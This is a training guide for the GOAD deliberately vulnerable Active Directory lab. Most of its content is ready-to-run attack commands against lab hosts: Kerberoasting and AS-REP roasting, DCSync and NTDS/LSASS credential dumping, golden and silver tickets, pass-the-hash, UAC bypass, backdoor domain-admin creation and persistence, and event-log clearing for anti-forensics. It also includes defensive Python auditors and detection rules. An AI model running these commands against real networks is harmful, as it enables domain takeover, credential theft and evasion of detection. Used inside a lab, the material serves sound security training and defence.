GOAD (Game of Active Directory)
GOAD (Game of Active Directory) is a vulnerable-by-design Active Directory lab environment built for offensive security training. It creates a multi-domain forest with deliberate security misconfigurations, lateral movement paths, and privilege escalation opportunities.
Lab Architecture
GOAD creates a multi-domain environment with the following structure:
- GOAD.LOCAL (root domain) - Windows Server 2019/2022 with multiple DCs
- SEVENKINGDOMS.LOCAL (child domain) - Subdomain with trusts
- ESSOS.LOCAL (external domain) - External forest with forest trust
- NORTH.SEVENKINGDOMS.LOCAL (grandchild domain) - Additional complexity
Installation
Prerequisites
System requirements:
- Terraform or Vagrant (infrastructure provisioning)
- VirtualBox or Proxmox (hypervisor)
- 16GB+ RAM minimum
- 100GB+ disk space
- Git for repository cloning
Clone and Set Up GOAD
```bash
# Clone GOAD repository
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD

# Install Terraform
# Ubuntu/Debian (terraform is not in the stock repositories; add HashiCorp's apt repository first)
sudo apt-get install terraform
# macOS
brew install terraform
# Windows (or use Terraform downloads)
choco install terraform

# Install Vagrant (alternative to Terraform)
# Ubuntu
sudo apt-get install vagrant virtualbox
# macOS
brew install vagrant virtualbox
```
Create Lab with Terraform
```bash
# Navigate to terraform directory
cd GOAD/providers/terraform
# Initialize Terraform
terraform init
# Plan deployment
terraform plan
# Deploy infrastructure
terraform apply -auto-approve
# Check deployment status
terraform show
# Destroy lab when done
terraform destroy -auto-approve
```
Create Lab with Vagrant
```bash
# Navigate to vagrant directory
cd GOAD/providers/vagrant
# List available machines
vagrant status
# Start all VMs
vagrant up
# Start specific VMs
vagrant up DC01 DC02 SRV02 etc01
# Stop VMs
vagrant halt
# Destroy environment
vagrant destroy -f
```
Domain Enumeration
Initial Reconnaissance
```text
# Get domain information (anonymous bind; fails if the DC rejects anonymous LDAP)
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=domain)"
# List all users
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=user)" sAMAccountName
# List all groups
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=group)" distinguishedName
# List all computers
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=computer)" dNSHostName
# Enumerate domain trusts (from a domain-joined Windows host)
nltest /domain_trusts /all_trusts
# Dump all domain account hashes (mimikatz DCSync; needs replication rights, i.e. DA-level access)
lsadump::dcsync /domain:goad.local /all /csv
```
User Enumeration
```powershell
# Using PowerView (PowerShell)
Get-DomainUser | Select-Object samAccountName, userAccountControl
# Find users with pre-auth disabled (AS-REP roastable)
Get-DomainUser -UACFilter DONT_REQUIRE_PREAUTH
# Find service accounts with SPNs (these are the kerberoastable accounts)
Get-DomainUser -SPN | Select-Object samAccountName, servicePrincipalName
# Find admin users
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | Select-Object MemberName
```
Attack Paths
Path 1: NORTH Domain Compromise
```text
# Enumerate the NORTH domain across the domain trust (PowerView)
Get-DomainComputer -Domain north.sevenkingdoms.local
# Find service accounts with SPNs
Get-DomainUser -Domain north.sevenkingdoms.local -SPN
# Kerberoast the service accounts (impacket; DC02 is the SEVENKINGDOMS DC, -target-domain follows the trust)
python3 GetUserSPNs.py -dc-ip 192.168.56.11 -target-domain north.sevenkingdoms.local sevenkingdoms.local/user:password -request -outputfile north_hashes.txt
# Crack the TGS hashes
hashcat -m 13100 north_hashes.txt wordlist.txt
# Use the cracked credentials for lateral movement (Sysinternals PsExec takes the target before -u/-p)
psexec.exe \\192.168.56.30 -u NORTH\svc_account -p password cmd.exe
```
Path 2: SEVENKINGDOMS Child Domain Compromise
```text
# Dump credentials from GOAD.LOCAL (mimikatz DCSync)
lsadump::dcsync /domain:goad.local /user:Administrator
# Create golden ticket
kerberos::golden /user:Administrator /domain:goad.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /ticket:golden.kirbi
# Use golden ticket for child domain
kerberos::ptt golden.kirbi
# Access child domain resources
net use \\DC02.sevenkingdoms.local\c$
```
Path 3: Cross-Forest Trust Exploitation
```text
# Get forest trusts (PowerView)
Get-DomainTrust -Forest
# List ESSOS forest users
Get-DomainUser -Domain essos.local
# Create inter-realm ticket for forest trust (mimikatz)
kerberos::tgt /user:Administrator@GOAD.LOCAL /domain:GOAD.LOCAL /krbtgt:hash
# Request service ticket across trust
kerberos::s4u /user:Administrator@GOAD.LOCAL /domain:ESSOS.LOCAL /impersonate:Administrator /ticket:tgt.kirbi /service:cifs/fileserver.essos.local
```
Path 4: Constrained Delegation Abuse
```text
# Find accounts with delegation rights (PowerView)
Get-DomainUser -AllowDelegation | Select-Object samAccountName, userAccountControl
# Extract service account creds via Kerberoast (impacket)
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request
# Use delegation to impersonate admin (Rubeus)
Rubeus.exe s4u /user:service_account /password:cracked_password /impersonate:Administrator /domain:goad.local /dc:192.168.56.10
```
Lateral Movement Techniques
Pass-the-Hash (PTH)
```text
# Extract NTLM hash from DC (mimikatz DCSync)
lsadump::dcsync /domain:goad.local /user:Administrator
# Spawn a process with the hash (PTH)
pth-winexe -U GOAD/Administrator%hash //target.local cmd
# SMB pass-the-hash (impacket)
psexec.py -hashes :hash DOMAIN/user@target.local
# Map a share with plaintext credentials (not PTH: net use has no hash option)
net use \\target\c$ /user:DOMAIN\user password
```
Kerberos Attacks
```text
# Create silver ticket for service (mimikatz)
kerberos::silver /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /target:fileserver.local /service:cifs /hash:service_hash
# Inject ticket and access share
kerberos::ptt silver.kirbi
net use \\fileserver.local\share
# AS-REP roasting (impacket)
GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt
# Kerberoasting
GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt wordlist.txt
```
WMI Lateral Movement
```text
# Execute command via WMI
wmic /node:target /user:DOMAIN\user /password:password process call create "cmd.exe /c powershell IEX..."
# Create WMI event subscription for persistence
wmic /node:target /user:domain\admin /password:pass create session
wmic /node:target event filter create name="malware" eventnamespace="\\\\.\\root\\cimv2" querylanguage=WQL query="SELECT * FROM __InstanceModificationEvent WITHIN 60"
```
RDP Lateral Movement
```text
# RDP with extracted credentials
xfreerdp /u:DOMAIN\\user /p:password /v:target.local
# Restricted Admin mode: pass-the-hash over RDP (only works if the target has Restricted Admin enabled)
xfreerdp /u:DOMAIN\\user /pth:ntlmhash /v:target.local
# Enable RDP on a host
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# RDP via the Windows client (mstsc has no /u: switch; credentials are entered at the prompt)
mstsc.exe /v:target.local
```
Privilege Escalation
UAC Bypass Techniques
```text
# Token impersonation (Metasploit)
meterpreter > steal_token <pid>
meterpreter > execute -f cmd.exe -i
# PPID spoofing (Cobalt Strike)
beacon > spawnto x64 explorer.exe
beacon > execute-assembly Rubeus.exe asktgt /user:admin /password:pass
# Scheduled task privilege escalation
schtasks /create /tn privesc /tr "C:\payload.exe" /sc onstart /ru System
# Service binary hijacking
takeown /f C:\path\to\service.exe
icacls C:\path\to\service.exe /grant Everyone:F
# Replace service.exe and restart
net stop servicename
net start servicename
```
Privilege Escalation via Misconfigurations
```powershell
# Find services whose binaries have weak ACLs (check each service's own ImagePath, not a fixed file)
Get-CimInstance Win32_Service | ForEach-Object { icacls (($_.PathName -replace '"','') -replace '(?i)(\.exe).*$','$1') }
# Services whose binary lives under a user profile
Get-CimInstance Win32_Service | Where-Object { $_.PathName -match "C:\\Users" }
# Unquoted service paths (cmd.exe; findstr replaces grep, """" matches a literal quote)
reg query "HKLM\SYSTEM\CurrentControlSet\Services" /s /v ImagePath | findstr /i /v """"
# If the path is C:\Program Files\...\service.exe without quotes, Windows tries C:\Program.exe first,
# so a binary placed at that location runs with the service's privileges
```
Abuse of Credentials
```text
# DCSync NT hashes with impacket (the flag is -just-dc-ntlm; -just-dc-user-sam does not exist)
secretsdump.py -just-dc-ntlm DOMAIN/admin@192.168.56.10
# Forge a golden ticket from the krbtgt NT hash with impacket's ticketer.py (not pass-the-key)
python3 ticketer.py -nthash hash -domain-sid S-1-5-21-xxx -domain DOMAIN.LOCAL admin
# Credential dumping from LSASS (mimikatz; lsadump::process is not a mimikatz command)
sekurlsa::logonpasswords
procdump.exe -ma lsass.exe lsass.dmp
```
Persistence and Cleanup
Persistence Mechanisms
```text
# Create domain admin backdoor
net user backdoor Password123! /add /domain
net group "Domain Admins" backdoor /add /domain
# Registry persistence (HKCU Run)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "C:\payload.exe"
# Scheduled task persistence
schtasks /create /tn "Windows Maintenance" /tr "C:\payload.exe" /sc onstart /ru System
# WMI event subscription persistence
wmic /namespace:"\\\\.\root\subscription" class __EventFilter create Name="malware", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60"
# Golden ticket for persistence (mimikatz)
kerberos::golden /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /krbtgt:hash /ticket:golden.kirbi
kerberos::ptt golden.kirbi
# Silver ticket for specific service
kerberos::silver /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /target:dc01.goad.local /service:cifs /hash:service_hash /ticket:silver.kirbi
```
Cleanup and Anti-Forensics
```text
# Clear Event Logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Delete PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
# Clear DNS cache
ipconfig /flushdns
# Remove persistent scheduled tasks
schtasks /delete /tn "Windows Maintenance" /f
# Remove domain backdoor user
net user backdoor /delete /domain
# Remove registry persistence
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /f
# Dump SAM for offline analysis (before cleanup)
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
```
Lab Troubleshooting
```text
# Verify DC connectivity
ping dc01.goad.local
nslookup dc01.goad.local
# Check domain replication
repadmin /replsummary
# Verify domain trust relationships
nltest /domain_trusts
# List domain controllers
nltest /dclist:goad.local
# Verify and, if broken, reset the secure channel to the domain (nltest has no /resetpwd switch)
nltest /sc_verify:goad.local
nltest /sc_reset:goad.local
# Check LDAP reachability (PowerShell)
Test-NetConnection dc01.goad.local -Port 389
```
Common Vulnerability Scenarios in GOAD
Scenario 1: Weak Service Account Passwords
```text
# Identify service accounts (PowerView)
Get-DomainUser -SPN | Select-Object samAccountName, servicePrincipalName
# Kerberoast them (impacket)
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request -outputfile kerberoast.txt
# Crack with weak wordlist
hashcat -m 13100 kerberoast.txt rockyou.txt
# Lateral movement with the cracked password
psexec.py goad.local/service_account:cracked_password@192.168.56.30
```
Scenario 2: Users without Pre-Authentication
```text
# Find vulnerable users (no password needed for accounts with pre-auth disabled)
python3 GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -usersfile users.txt -no-pass -format john
# Extract AS-REP hashes
python3 GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -format hashcat -outputfile asrep.txt
# Crack offline
hashcat -m 18200 asrep.txt wordlist.txt
# Use cracked credentials
psexec.py goad.local/user:password@192.168.56.10
```
Scenario 3: Domain Trust Exploitation
```text
# Identify domain trusts (PowerView)
Get-DomainTrust
# Extract parent domain credentials (mimikatz DCSync)
lsadump::dcsync /domain:goad.local /all /csv
# Create inter-realm TGT
kerberos::tgt /user:Administrator@goad.local /domain:goad.local /krbtgt:hash
# Request ticket for child domain
kerberos::s4u /user:Administrator@goad.local /domain:sevenkingdoms.local /impersonate:Administrator /ticket:tgt.kirbi
# Access child domain resources
net use \\dc02.sevenkingdoms.local\c$
```
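The trust data that `Get-DomainTrust` and `nltest /domain_trusts` return (Path 3 above and this scenario) also tells a defender which of the lab's trusts can be abused this way. The following is an added example, not GOAD's or PowerView's code: it decodes the `trustAttributes` bit field of `trustedDomain` objects and reports the settings that matter for cross-domain ticket abuse (an intra-forest trust that cannot be filtered, a forest trust with SID history allowed, an external trust without quarantine, no selective authentication, RC4 trust keys). The records are constructed in the shape of the LDAP attributes and only reuse the lab's documented domain names; `legacy.example` is a hypothetical external trust.

```python
"""Decode trustedDomain attributes and flag risky trust configurations.

Added example, not part of GOAD or PowerView. Records are constructed in the
shape of the trustedDomain LDAP attributes (trustAttributes, trustDirection);
real values come from a search of CN=System,DC=... for objectClass=trustedDomain.
"""

# Bit values of the trustAttributes attribute ([MS-ADTS] 6.1.6.7.9).
TRUST_ATTRIBUTES = {
    0x01: "NON_TRANSITIVE",
    0x02: "UPLEVEL_ONLY",
    0x04: "QUARANTINED_DOMAIN",    # SID filtering enforced on an external trust
    0x08: "FOREST_TRANSITIVE",
    0x10: "CROSS_ORGANIZATION",    # selective authentication
    0x20: "WITHIN_FOREST",         # parent/child or tree-root trust
    0x40: "TREAT_AS_EXTERNAL",     # forest trust with SID history allowed
    0x80: "USES_RC4_ENCRYPTION",
}
TRUST_DIRECTION = {0: "DISABLED", 1: "INBOUND", 2: "OUTBOUND", 3: "BIDIRECTIONAL"}


def decode_attributes(value):
    """Names of the trustAttributes bits set in value, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]


def classify(attrs):
    if "WITHIN_FOREST" in attrs:
        return "intra-forest"
    if "FOREST_TRANSITIVE" in attrs:
        return "forest"
    return "external"


def audit_trust(trust):
    """Return (kind, findings) for one trustedDomain record."""
    attrs = set(decode_attributes(trust["trustAttributes"]))
    kind = classify(attrs)
    findings = []
    if kind == "intra-forest":
        # Parent/child trusts cannot be SID-filtered: the forest, not the domain,
        # is the security boundary, so a child-domain compromise reaches the root.
        findings.append("intra-forest trust: domain compromise extends to the whole forest")
    elif kind == "forest" and "TREAT_AS_EXTERNAL" in attrs:
        findings.append("forest trust with SID history enabled (SID filtering relaxed)")
    elif kind == "external" and "QUARANTINED_DOMAIN" not in attrs:
        findings.append("external trust without SID filtering (quarantine)")
    if kind != "intra-forest" and "CROSS_ORGANIZATION" not in attrs:
        findings.append("selective authentication not enabled")
    if "USES_RC4_ENCRYPTION" in attrs:
        findings.append("trust uses RC4 (AES not negotiated)")
    return kind, findings


def audit_trusts(trusts):
    """Map each trust partner to its kind, direction and findings."""
    report = {}
    for t in trusts:
        kind, findings = audit_trust(t)
        report[t["name"]] = {
            "kind": kind,
            "direction": TRUST_DIRECTION.get(t["trustDirection"], "UNKNOWN"),
            "findings": findings,
        }
    return report


# Constructed sample: what GOAD.LOCAL's trustedDomain objects might look like.
SAMPLE_TRUSTS = [
    {"name": "sevenkingdoms.local", "trustDirection": 3, "trustAttributes": 0x20},
    {"name": "essos.local", "trustDirection": 3, "trustAttributes": 0x48},
    # hypothetical external trust with no SID filtering and RC4 keys
    {"name": "legacy.example", "trustDirection": 1, "trustAttributes": 0x80},
]

if __name__ == "__main__":
    for name, info in audit_trusts(SAMPLE_TRUSTS).items():
        print(f"{name}: {info['kind']} / {info['direction']}")
        for f in info["findings"]:
            print(f"  - {f}")
```

The intra-forest finding is informational: nothing can be configured away there, which is why the child-domain path above works. The forest-trust finding is the one to act on, since SID history across a forest trust is what lets a forged inter-realm ticket carry privileged SIDs from the other forest.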
Scenario 4: Constrained Delegation
```text
# Find accounts with delegation (PowerView)
Get-DomainUser -AllowDelegation
# Extract credentials via Kerberoast (impacket)
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request
# S4U2self/S4U2proxy to impersonate an admin with impacket getST.py (impacket ships no s4u.py)
python3 getST.py -spn cifs/fileserver.goad.local -impersonate Administrator -hashes :hash goad.local/svc_account
```
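The user enumeration section, Path 4 and Scenarios 2 and 4 all hinge on a handful of `userAccountControl` bits and delegation attributes. The following is an added example, not GOAD's, PowerView's or impacket's code: a defender-side audit that decodes those bits for a set of account records and reports the conditions the attacks above need (pre-auth disabled, SPNs on a user account, unconstrained delegation on a non-DC, constrained delegation with or without protocol transition, privileged accounts not marked as non-delegatable). The records are constructed in the shape of the LDAP attributes that `ldapsearch` or `Get-DomainUser` return; the account names are placeholders, not GOAD's real accounts.

```python
"""Audit userAccountControl and delegation attributes for the settings that the
enumeration and attack paths above rely on.

Added example, not part of GOAD, PowerView or impacket. Records are constructed
in the shape of LDAP attributes returned by the queries above; account names are
placeholders.
"""

# userAccountControl bits ([MS-ADTS] 2.2.16); subset relevant to this audit.
UAC = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",                # domain controller
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",             # unconstrained delegation
    0x100000: "NOT_DELEGATED",                     # "sensitive and cannot be delegated"
    0x400000: "DONT_REQUIRE_PREAUTH",              # AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",   # constrained delegation + protocol transition
}


def decode_uac(value):
    """Set of flag names for a userAccountControl integer."""
    return {name for bit, name in UAC.items() if value & bit}


def audit_account(acct):
    """Return a list of findings for one account record."""
    flags = decode_uac(acct["userAccountControl"])
    spns = acct.get("servicePrincipalName", [])
    delegate_to = acct.get("msDS-AllowedToDelegateTo", [])
    privileged = acct.get("adminCount", 0) == 1
    findings = []
    if "ACCOUNTDISABLE" in flags:
        return findings   # disabled accounts cannot be roasted or delegated to
    if "DONT_REQUIRE_PREAUTH" in flags:
        findings.append("AS-REP roastable: DONT_REQUIRE_PREAUTH set")
    if spns and "NORMAL_ACCOUNT" in flags:   # user (not machine) account with SPNs
        f = "Kerberoastable: user account holds SPNs"
        if "DONT_EXPIRE_PASSWORD" in flags:
            f += " and password never expires"
        if privileged:
            f += " (privileged: adminCount=1)"
        findings.append(f)
    if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
        findings.append("unconstrained delegation on a non-DC account")
    if delegate_to:
        kind = ("constrained delegation with protocol transition"
                if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags else "constrained delegation")
        findings.append(f"{kind} to {', '.join(delegate_to)}")
    if "PASSWD_NOTREQD" in flags:
        findings.append("PASSWD_NOTREQD: empty password permitted")
    if privileged and "NOT_DELEGATED" not in flags:
        findings.append("privileged account not marked 'sensitive and cannot be delegated'")
    return findings


def audit_domain(accounts):
    """Map sAMAccountName -> findings, omitting clean accounts."""
    report = {}
    for a in accounts:
        findings = audit_account(a)
        if findings:
            report[a["sAMAccountName"]] = findings
    return report


# Constructed sample records (placeholder names, not GOAD's real accounts).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x10200},
    {"sAMAccountName": "bob", "userAccountControl": 0x400200},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200, "adminCount": 1,
     "servicePrincipalName": ["MSSQLSvc/srv02.goad.local:1433"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/srv03.goad.local"]},
    {"sAMAccountName": "SRV02$", "userAccountControl": 0x81000},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "olduser", "userAccountControl": 0x400202},
]

if __name__ == "__main__":
    for name, findings in audit_domain(SAMPLE_ACCOUNTS).items():
        print(name)
        for f in findings:
            print("  -", f)
```

Run against a real export, each finding maps to a fix: clear `DONT_REQUIRE_PREAUTH`, move SPN-bearing accounts to group managed service accounts or long random passwords, replace unconstrained with resource-based constrained delegation, and put privileged accounts in Protected Users or set `NOT_DELEGATED`.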
Credential Dumping from GOAD
NTDS.dit Extraction
```text
# Copy NTDS.dit from the DC (requires SYSTEM; a plain copy fails on a running DC because the file is locked)
powershell -Command "Copy-Item C:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit"
# Copy the SYSTEM registry hive (holds the boot key needed to decrypt the hashes)
reg save HKLM\SYSTEM C:\Temp\SYSTEM
# Extract credentials offline (impacket)
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile domain_hashes
# Keep user and NT hash; the output format is domain\user:rid:lmhash:nthash::: in domain_hashes.ntds
cut -d: -f1,4 domain_hashes.ntds > users_hashes.txt
# Crack domain admin hash
hashcat -m 1000 domain_admin_hash rockyou.txt
```
LSASS Memory Dumping
```text
# Dump LSASS process (Sysinternals)
procdump.exe -ma lsass.exe lsass.dmp
# Parse with pypykatz (installed as the pypykatz command, not a .py script)
pypykatz lsa minidump lsass.dmp -o lsass_creds
# secretsdump.py has no LSASS-dump mode; grep the pypykatz output instead
grep -i -A3 "username" lsass_creds
```
DCSync Attacks
```text
# DCSync all users from DC (mimikatz)
lsadump::dcsync /domain:goad.local /all /csv
# DCSync specific user
lsadump::dcsync /domain:goad.local /user:krbtgt
# DCSync with impacket (-just-dc-ntlm; -just-dc-user-sam is not a valid flag)
secretsdump.py -just-dc-ntlm goad.local/user:password@192.168.56.10
# Extract krbtgt for golden tickets
lsadump::dcsync /domain:goad.local /user:krbtgt /csv
```
GOAD Domain Structure
| Domain | Forest | Type | Purpose |
|---|---|---|---|
| GOAD.LOCAL | GOAD | Root Domain | Primary domain with vulnerabilities |
| SEVENKINGDOMS.LOCAL | GOAD | Child Domain | Child domain of GOAD.LOCAL |
| NORTH.SEVENKINGDOMS.LOCAL | GOAD | Grandchild Domain | Demonstrates domain hierarchy |
| ESSOS.LOCAL | ESSOS | External Forest | Separate forest with trust |
Key Machines in GOAD
| Machine | Domain | Role | IP | OS |
|---|---|---|---|---|
| DC01 | GOAD.LOCAL | Domain Controller | 192.168.56.10 | Windows Server 2019 |
| DC02 | SEVENKINGDOMS.LOCAL | Child DC | 192.168.56.11 | Windows Server 2019 |
| DC03 | NORTH.SEVENKINGDOMS.LOCAL | Grandchild DC | 192.168.56.12 | Windows Server 2019 |
| SRV02 | GOAD.LOCAL | Member Server | 192.168.56.20 | Windows Server 2019 |
| SRV03 | SEVENKINGDOMS.LOCAL | Member Server | 192.168.56.30 | Windows Server 2019 |
| ROOTDC | ESSOS.LOCAL | Root DC (Forest) | 192.168.56.50 | Windows Server 2019 |
Attack Workflow Example
Initial Access to GOAD
```text
# 1. Scan network
nmap -p 139,445,389,3268 192.168.56.0/24
# 2. Enumerate DC
enum4linux -a 192.168.56.10
# 3. User enumeration (impacket; needs any domain account)
GetADUsers.py -all -dc-ip 192.168.56.10 goad.local/user:password
# 4. Check for pre-auth disabled
GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -format hashcat -outputfile asrep.txt
# 5. Crack hashes (if successful)
hashcat -m 18200 asrep.txt rockyou.txt
# 6. Use cracked credentials for lateral movement
psexec.py goad.local/user:password@192.168.56.10
# 7. Escalate to domain admin
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request -outputfile kerberoast.txt
hashcat -m 13100 kerberoast.txt rockyou.txt
# 8. Domain compromise
psexec.py -hashes :hash goad.local/administrator@192.168.56.10
# 9. Golden ticket for persistence (mimikatz)
lsadump::dcsync /domain:goad.local /user:krbtgt
kerberos::golden /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /krbtgt:hash
```
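Each step of this workflow leaves a trace in the Security log of the lab's DCs, which is what the "review lab logs" practice at the end of this page is about. The following is an added example, not GOAD's code: detection logic for the Kerberos attacks (steps 4 and 7), DCSync (step 9), the backdoor account from the persistence section and the log clearing from the cleanup section, run over a constructed timeline of records shaped like Windows Security events 4768, 4769, 4662, 4728 and 1102. The field names follow the event XML; the account names, times and the thresholds `KERBEROAST_MIN_SPNS` and `WINDOW` are assumptions to be tuned on real volume.

```python
"""Detection logic for the workflow above, run over constructed Security-log records.

Added example, not part of GOAD. The records imitate the fields of Windows
Security events 4768, 4769, 4662, 4728 and 1102 as a SIEM would present them;
account names, times and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

KERBEROAST_MIN_SPNS = 3   # distinct RC4 service tickets by one account inside WINDOW
WINDOW = timedelta(minutes=5)
RC4_HMAC = "0x17"         # TicketEncryptionType for RC4, the material hashcat 13100/18200 crack
# Control access rights that DCSync (lsadump::dcsync, secretsdump -just-dc-ntlm) exercises
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect(events):
    """Return (rule, subject) alerts in timeline order; Kerberoasting is evaluated last."""
    alerts = []
    rc4_tgs = defaultdict(list)   # requesting account -> [(time, service)]
    for e in sorted(events, key=lambda e: e["time"]):
        eid = e["EventID"]
        if eid == 4768 and e.get("PreAuthType") == "0" and e.get("TicketEncryptionType") == RC4_HMAC:
            # TGT issued without pre-authentication: AS-REP roasting (GetNPUsers)
            alerts.append(("AS-REP roasting", e["TargetUserName"]))
        elif eid == 4769 and e.get("TicketEncryptionType") == RC4_HMAC:
            svc = e["ServiceName"]
            if svc != "krbtgt" and not svc.endswith("$"):   # user SPNs only
                rc4_tgs[e["TargetUserName"]].append((parse_time(e["time"]), svc))
        elif eid == 4662 and REPL_GUIDS & set(e.get("Properties", [])):
            # Replication rights used by something other than a DC machine account
            if not e["SubjectUserName"].endswith("$"):
                alerts.append(("DCSync", e["SubjectUserName"]))
        elif eid in (4728, 4732, 4756) and e.get("TargetUserName") in PRIVILEGED_GROUPS:
            alerts.append(("privileged group change", f'{e["MemberName"]} -> {e["TargetUserName"]}'))
        elif eid == 1102:
            alerts.append(("audit log cleared", e["SubjectUserName"]))
    # Kerberoasting: GetUserSPNs -request pulls one RC4 TGS per SPN in quick succession
    for user, reqs in rc4_tgs.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= WINDOW}
            if len(services) >= KERBEROAST_MIN_SPNS:
                alerts.append(("Kerberoasting", user))
                break
    return alerts


# Constructed sample timeline (not real lab output).
SAMPLE_EVENTS = [
    {"time": "2024-01-01 10:00:00", "EventID": 4768, "TargetUserName": "user1",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01 10:05:00", "EventID": 4769, "TargetUserName": "user1",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01 10:05:02", "EventID": 4769, "TargetUserName": "user1",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01 10:05:04", "EventID": 4769, "TargetUserName": "user1",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01 10:05:05", "EventID": 4769, "TargetUserName": "user1",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"time": "2024-01-01 10:30:00", "EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"time": "2024-01-01 10:31:00", "EventID": 4662, "SubjectUserName": "svc_backup",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"time": "2024-01-01 10:40:00", "EventID": 4728, "MemberName": "CN=backdoor,CN=Users,DC=goad,DC=local",
     "TargetUserName": "Domain Admins"},
    {"time": "2024-01-01 10:45:00", "EventID": 1102, "SubjectUserName": "Administrator"},
]

if __name__ == "__main__":
    for rule, subject in detect(SAMPLE_EVENTS):
        print(f"{rule}: {subject}")
```

The RC4 filter is the important design choice: with AES-only service accounts the Kerberoast and AS-REP rules stop firing on legitimate traffic, and the lab is a good place to confirm that the `-format hashcat` output really does disappear once RC4 is disabled. The 4662 rule needs the "Replicating Directory Changes" audit SACL enabled on the domain object, and DC machine accounts are excluded because they replicate by design.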
Learning Objectives from GOAD
- Multi-domain forest enumeration and exploitation
- Domain trust exploitation and abuse
- Service account targeting and Kerberoasting
- Constrained and unconstrained delegation attacks
- Golden ticket and silver ticket creation
- Pass-the-hash and pass-the-ticket techniques
- Cross-forest attack chains
- Privilege escalation in complex environments
- Credential dumping at scale
- Lateral movement across domains
Best Practices for GOAD Practice
- Start with unauthenticated enumeration
- Practice each attack vector independently first
- Document all credentials and hashes extracted
- Test cleanup and anti-forensics techniques
- Use different tools for same attack (impacket, Rubeus, mimikatz)
- Practice OPSEC and avoid detection
- Time attacks and measure impact
- Restore lab between practice sessions
- Review lab logs to understand detection opportunities